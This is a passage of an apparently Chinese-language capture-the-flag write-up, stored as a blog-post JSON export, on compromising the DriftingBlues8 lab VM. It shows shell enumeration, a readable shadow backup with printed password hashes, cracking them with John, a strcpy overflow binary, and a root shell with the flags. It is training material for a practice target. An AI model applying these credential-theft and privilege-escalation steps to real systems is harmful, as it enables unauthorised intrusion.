4096 Apr 25  2021 ..\n-rwxrwxrwx  1 www-data www-data    567 May 28  2018 .bowerrc\n-rwxrwxrwx  1 www-data www-data    129 May 28  2018 .editorconfig\n-rwxrwxrwx  1 www-data www-data     80 May 28  2018 .env.example\ndrwxrwxrwx  2 www-data www-data   4096 May 28  2018 .github\n-rwxrwxrwx  1 www-data www-data     35 May 28  2018 .gitignore\n-rwxrwxrwx  1 www-data www-data    301 May 28  2018 .travis.yml\n-rwxrwxrwx  1 
www-data www-data   5526 May 28  2018 CODE_OF_CONDUCT.md\n-rwxrwxrwx  1 www-data www-data   2876 May 28  2018 CONTRIBUTING.md\ndrwxrwxrwx  4 www-data www-data   4096 May 28  2018 Documentation\n-rwxrwxrwx  1 www-data www-data  35147 May 28  2018 LICENSE\n-rwxrwxrwx  1 www-data www-data   3356 May 28  2018 README.md\n-rwxrwxrwx  1 www-data www-data  20701 May 28  2018 acknowledge_license_cert.html\n-rwxrwxrwx  1 www-data www-data  19560 May 28  2018 acl_setup.php\n-rwxrwxrwx  1 www-data www-data  48330 May 28  2018 acl_upgrade.php\n-rwxrwxrwx  1 www-data www-data   4988 May 28  2018 admin.php\n-rwxrwxrwx  1 www-data www-data   3805 May 28  2018 bower.json\n-rwxrwxrwx  1 www-data www-data   6102 May 28  2018 build.xml\ndrwxrwxrwx  2 www-data www-data   4096 May 28  2018 ccdaservice\ndrwxrwxrwx  4 www-data www-data   4096 May 28  2018 ccr\ndrwxrwxrwx  2 www-data www-data   4096 May 28  2018 ci\ndrwxrwxrwx  2 www-data www-data   4096 May 28  2018 cloud\ndrwxrwxrwx  7 www-data www-data   4096 May 28  2018 common\n-rwxrwxrwx  1 www-data www-data   3301 May 28  2018 composer.json\n-rwxrwxrwx  1 www-data www-data 265675 May 28  2018 composer.lock\ndrwxrwxrwx  2 www-data www-data   4096 May 28  2018 config\ndrwxrwxrwx 11 www-data www-data   4096 May 28  2018 contrib\n-rwxrwxrwx  1 www-data www-data    108 May 28  2018 controller.php\ndrwxrwxrwx  2 www-data www-data   4096 May 28  2018 controllers\ndrwxrwxrwx  2 www-data www-data   4096 May 28  2018 custom\n-rwxrwxrwx  1 www-data www-data   3995 May 28  2018 docker-compose.yml\ndrwxrwxrwx  2 www-data www-data   4096 May 28  2018 entities\ndrwxrwxrwx  8 www-data www-data   4096 May 28  2018 gacl\ndrwxrwxrwx  2 www-data www-data   4096 May 28  2018 images\n-rwxrwxrwx  1 www-data www-data    901 May 28  2018 index.php\ndrwxrwxrwx 32 www-data www-data   4096 May 28  2018 interface\n-rwxrwxrwx  1 www-data www-data   5381 May 28  2018 ippf_upgrade.php\ndrwxrwxrwx 25 www-data www-data   4096 May 28  2018 library\ndrwxrwxrwx  3 
www-data www-data   4096 May 28  2018 modules\ndrwxrwxrwx  3 www-data www-data   4096 May 28  2018 myportal\ndrwxrwxrwx  4 www-data www-data   4096 May 28  2018 patients\ndrwxrwxrwx  6 www-data www-data   4096 May 28  2018 phpfhir\ndrwxrwxrwx 10 www-data www-data   4096 May 28  2018 portal\ndrwxrwxrwx  5 www-data www-data   4096 May 28  2018 public\ndrwxrwxrwx  2 www-data www-data   4096 May 28  2018 repositories\ndrwxrwxrwx  2 www-data www-data   4096 May 28  2018 services\n-rwxrwxrwx  1 www-data www-data  40570 May 28  2018 setup.php\ndrwxrwxrwx  3 www-data www-data   4096 May 28  2018 sites\ndrwxrwxrwx  2 www-data www-data   4096 May 28  2018 sql\n-rwxrwxrwx  1 www-data www-data   4650 May 28  2018 sql_patch.php\n-rwxrwxrwx  1 www-data www-data   5375 May 28  2018 sql_upgrade.php\ndrwxrwxrwx 15 www-data www-data   4096 May 28  2018 templates\ndrwxrwxrwx  5 www-data www-data   4096 May 28  2018 tests\ndrwxrwxrwx 34 www-data www-data   4096 May 28  2018 vendor\n-rwxrwxrwx  1 www-data www-data   2119 May 28  2018 version.php\n-rwxrwxrwx  1 www-data www-data  14394 Apr 25  2021 wordlist.txt\n(remote) www-data@driftingblues:\/var\/www\/html$ cd \/home\n(remote) www-data@driftingblues:\/home$ ls -la\ntotal 12\ndrwxr-xr-x  3 root    root    4096 Apr 25  2021 .\ndrwxr-xr-x 18 root    root    4096 Apr 25  2021 ..\ndrwx------  2 clapton clapton 4096 Apr 25  2021 clapton\n(remote) www-data@driftingblues:\/home$ cd clapton\/\nbash: cd: clapton\/: Permission denied\n(remote) www-data@driftingblues:\/home$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\ncat: \/etc\/cron.weekly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. 
These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily )\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly )\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly )\n#\n(remote) www-data@driftingblues:\/home$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System 
(admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:102:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nmysql:x:105:112:MySQL Server,,,:\/nonexistent:\/bin\/false\nclapton:x:1000:1000:,,,:\/home\/clapton:\/bin\/bash\n(remote) www-data@driftingblues:\/home$ \/usr\/sbin\/getcap -r \/dev\/null<\/code><\/pre>\n<p>\u5c1d\u8bd5\u624b\u52a8\u67e5\u627e\u4e00\u4e0b\u76f8\u5173\u76ee\u5f55\uff0c\u5b9e\u5728\u4e0d\u884c\u53ea\u80fd\u5c1d\u8bd5\u4e0a\u4f20<code>linpeas.sh<\/code>\u548c<code>pspy64<\/code>\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@driftingblues:\/home$ cd \/\n(remote) www-data@driftingblues:\/$ ls -la\ntotal 65\ndrwxr-xr-x  18 root root  4096 Apr 25  2021 .\ndrwxr-xr-x  18 root root  4096 Apr 25  2021 ..\nlrwxrwxrwx   1 root root     7 Apr 25  2021 bin -&gt; usr\/bin\ndrwxr-xr-x   4 root root  1024 Apr 25  2021 boot\ndrwxr-xr-x  17 root root  3240 Apr 13 02:22 dev\ndrwxr-xr-x  73 root root  4096 Apr 13 02:22 etc\ndrwxr-xr-x   3 root root  4096 Apr 25  2021 home\nlrwxrwxrwx   1 root root    33 Apr 25  2021 initrd.img -&gt; boot\/initrd.img-4.19.0-16-686-pae\nlrwxrwxrwx   1 root root    33 Apr 25  2021 initrd.img.old -&gt; boot\/initrd.img-4.19.0-16-686-pae\nlrwxrwxrwx   1 root root     7 Apr 25  2021 lib -&gt; usr\/lib\nlrwxrwxrwx   1 root root     9 Apr 25  2021 lib64 -&gt; usr\/lib64\nlrwxrwxrwx   1 root root    10 Apr 25  2021 libx32 -&gt; usr\/libx32\ndrwx------   2 root root 16384 Apr 25  2021 lost+found\ndrwxr-xr-x   3 root root  4096 Apr 25  2021 media\ndrwxr-xr-x   2 
root root  4096 Apr 25  2021 mnt\ndrwxr-xr-x   2 root root  4096 Apr 25  2021 opt\ndr-xr-xr-x 135 root root     0 Apr 13 02:22 proc\ndrwx------   3 root root  4096 Apr 25  2021 root\ndrwxr-xr-x  18 root root   540 Apr 13 02:22 run\nlrwxrwxrwx   1 root root     8 Apr 25  2021 sbin -&gt; usr\/sbin\ndrwxr-xr-x   2 root root  4096 Apr 25  2021 srv\ndr-xr-xr-x  13 root root     0 Apr 13 02:21 sys\ndrwxrwxrwt   2 root root  4096 Apr 13 02:22 tmp\ndrwxr-xr-x  12 root root  4096 Apr 25  2021 usr\ndrwxr-xr-x  12 root root  4096 Apr 25  2021 var\nlrwxrwxrwx   1 root root    30 Apr 25  2021 vmlinuz -&gt; boot\/vmlinuz-4.19.0-16-686-pae\nlrwxrwxrwx   1 root root    30 Apr 25  2021 vmlinuz.old -&gt; boot\/vmlinuz-4.19.0-16-686-pae\n(remote) www-data@driftingblues:\/$ cd opt\n(remote) www-data@driftingblues:\/opt$ ls -la\ntotal 8\ndrwxr-xr-x  2 root root 4096 Apr 25  2021 .\ndrwxr-xr-x 18 root root 4096 Apr 25  2021 ..\n(remote) www-data@driftingblues:\/opt$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/chfn\n\/usr\/bin\/su\n\/usr\/bin\/gpasswd\n\/usr\/bin\/passwd\n\/usr\/bin\/mount\n\/usr\/bin\/newgrp\n\/usr\/bin\/umount\n\/usr\/bin\/chsh\n(remote) www-data@driftingblues:\/opt$ find \/ -writable  -type f 2&gt;\/dev\/null\n\/var\/www\/html\/interface\/billing\/era_payments.php\n\/var\/www\/html\/interface\/billing\/billing_process.php\n\/var\/www\/html\/interface\/billing\/sl_receipts_report.php\n\/var\/www\/html\/interface\/billing\/sl_eob_help.php\n\/var\/www\/html\/interface\/billing\/ub04_form.php\n........\n(remote) www-data@driftingblues:\/$ ss -tulnp                    \nNetid            State             Recv-Q            Send-Q          Local Address:Port                      Peer Address:Port\nudp              UNCONN            0                 0               0.0.0.0:68                              0.0.0.0:*\ntcp              LISTEN     
       0                 80              127.0.0.1:3306                          0.0.0.0:*\ntcp              LISTEN            0                 128             *:80                                    *:*     <\/code><\/pre>\n<p>\u540e\u9762\u8fd8\u5728\u5176\u4ed6\u76ee\u5f55\u770b\u4e86\uff0c\u4f46\u662f\u6ca1\u53d1\u73b0\u6709\u7528\u7684\uff0c\u5c1d\u8bd5\u4e0a\u4f20<code>linpeas.sh<\/code>\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533077.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533077.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413151733762\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u5b58\u5728<code>shadow<\/code>\u7684\u5907\u4efd\u6587\u4ef6\uff0c\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@driftingblues:\/tmp$ cd \/var\/backups\/\n(remote) www-data@driftingblues:\/var\/backups$ ls -la\ntotal 28\ndrwxr-xr-x  2 root root  4096 Apr 13 02:22 .\ndrwxr-xr-x 12 root root  4096 Apr 25  2021 ..\n-rw-r--r--  1 root root 13873 Apr 25  2021 apt.extended_states.0\n-rw-r--r--  1 root root   943 Apr 25  2021 shadow.backup\n(remote) www-data@driftingblues:\/var\/backups$ cat shadow.backup 
\nroot:$6$sqBC8Bk02qmul3ER$kysvb1LR5uywwKRc\/KQcmOMALcqd0NhHnU1Wbr9NRs9iz7WHwWqGkxKYRhadI3FWo3csX1BdQPHg33gwGVgMp.:18742:0:99999:7:::\ndaemon:*:18742:0:99999:7:::\nbin:*:18742:0:99999:7:::\nsys:*:18742:0:99999:7:::\nsync:*:18742:0:99999:7:::\ngames:*:18742:0:99999:7:::\nman:*:18742:0:99999:7:::\nlp:*:18742:0:99999:7:::\nmail:*:18742:0:99999:7:::\nnews:*:18742:0:99999:7:::\nuucp:*:18742:0:99999:7:::\nproxy:*:18742:0:99999:7:::\nwww-data:*:18742:0:99999:7:::\nbackup:*:18742:0:99999:7:::\nlist:*:18742:0:99999:7:::\nirc:*:18742:0:99999:7:::\ngnats:*:18742:0:99999:7:::\nnobody:*:18742:0:99999:7:::\n_apt:*:18742:0:99999:7:::\nsystemd-timesync:*:18742:0:99999:7:::\nsystemd-network:*:18742:0:99999:7:::\nsystemd-resolve:*:18742:0:99999:7:::\nmessagebus:*:18742:0:99999:7:::\nsystemd-coredump:!!:18742::::::\nmysql:!:18742:0:99999:7:::\nclapton:$6$\/eeR7\/4JGbeM7nwc$hANgsvO09hCCMkV5HiWsjTTS7NMOZ4tm8\/s4uzyZxLau2CSX7eEwjgcbfwcdvLV.XccVW5QuysP\/9JBjMkdXT\/:18742:0:99999:7:::<\/code><\/pre>\n<p>\u5c1d\u8bd5\u7834\u89e3\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues8]\n\u2514\u2500$ john hash.txt -w=\/usr\/share\/wordlists\/rockyou.txt \nUsing default input encoding: UTF-8\nLoaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256\/256 AVX2 4x])\nCost 1 (iteration count) is 5000 for all loaded hashes\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\ndragonsblood     (clapton)     \n1g 0:00:05:10 3.76% (ETA: 05:38:26) 0.003223g\/s 2005p\/s 2721c\/s 2721C\/s makz23..maimuni\nUse the &quot;--show&quot; option to display all of the cracked passwords reliably\nSession aborted<\/code><\/pre>\n<h3>\u5207\u6362clapton\u7528\u6237<\/h3>\n<pre><code class=\"language-bash\">su clapton\ndragonsblood<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533078.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533078.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413152658760\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\"># user.txt\n96716B8151B1682C5285BC99DD4E95C2<\/code><\/pre>\n<p>\u5c1d\u8bd5\u540e\u53f0\u7206\u7834\u4e00\u4e0b\uff0c\u7136\u540e\u5206\u6790\u4e00\u4e0b\u8fd9\u4e2a\u7a0b\u5e8f\uff1a<\/p>\n<pre><code class=\"language-c\">\/\/ main.c\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n  char buffer[100]; \/\/ [esp+0h] [ebp-6Ch]\n  int *v5; \/\/ [esp+64h] [ebp-8h]\n\n  v5 = &amp;argc;\n  strcpy(buffer, argv[1]);\n  return puts(&quot;hahaha silly hacker!&quot;);\n}<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533079.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533079.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413153117029\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>\u4e0d\u5b58\u5728\u7cfb\u7edf\u51fd\u6570\u3002\u3002\u3002\u3002\u96be\u9053\u6709\u5565\u5965\u79d8\uff1f<\/p>\n<pre><code class=\"language-bash\">(remote) clapton@driftingblues:\/home\/clapton$ .\/waytoroot -h\nhahaha silly hacker!<\/code><\/pre>\n<p>\u989d\uff0c\u540e\u9762\u7206\u7834\u51fa\u6765\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues8]\n\u2514\u2500$ john hash.txt -w=wordlist1.txt                   \nUsing default input encoding: UTF-8\nLoaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256\/256 AVX2 4x])\nRemaining 1 password hash\nCost 1 (iteration count) is 5000 for all loaded hashes\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\n0g 0:00:00:00 DONE (2024-04-13 03:29) 0g\/s 1810p\/s 1810c\/s 1810C\/s sfg365..sfdsfe\nSession completed. \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues8]\n\u2514\u2500$ john hash.txt -w=wordlist.txt \nUsing default input encoding: UTF-8\nLoaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256\/256 AVX2 4x])\nRemaining 1 password hash\nCost 1 (iteration count) is 5000 for all loaded hashes\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\n.:.yarak.:.      
(root)     \n1g 0:00:00:16 DONE (2024-04-13 03:29) 0.05892g\/s 3454p\/s 3454c\/s 3454C\/s kruimel..gamess\nUse the &quot;--show&quot; option to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n<p>\u83b7\u5f97rootshell\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) clapton@driftingblues:\/home\/clapton$ su -l root\nPassword: \nroot@driftingblues:~# pwd\n\/root\nroot@driftingblues:~# ls -la\ntotal 20\ndrwx------  3 root root 4096 Apr 25  2021 .\ndrwxr-xr-x 18 root root 4096 Apr 25  2021 ..\n-rw-------  1 root root  181 Apr 25  2021 .bash_history\ndrwx------  3 root root 4096 Apr 25  2021 .gnupg\n-rw-r--r--  1 root root   32 Apr 25  2021 root.txt\nroot@driftingblues:~# cat root.txt \nE8E7040D825E1F345A617E0E6612444Aroot@driftingblues:~# cat .bash_history \nls\nbash logdel2\nrm logdel2\nshutdown -h now\ncd \/home\/clapton\nls\nsu clapton\nclear\nls\ncd \/root\nwget 192.168.2.43:81\/hroot.txt\nmv hroot.txt root.txt\nclear\ncat root.txt \nshutdown -h now\nroot@driftingblues:~# cd .gnupg\/\nroot@driftingblues:~\/.gnupg# ls -la\ntotal 12\ndrwx------ 3 root root 4096 Apr 25  2021 .\ndrwx------ 3 root root 4096 Apr 25  2021 ..\ndrwx------ 2 root root 4096 Apr 25  2021 private-keys-v1.d<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>driftingblues8 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 172.20.10.7 &#8212; -A  
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-544","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/544","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=544"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/544\/revisions"}],"predecessor-version":[{"id":545,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/544\/revisions\/545"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=544"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=544"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=544"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}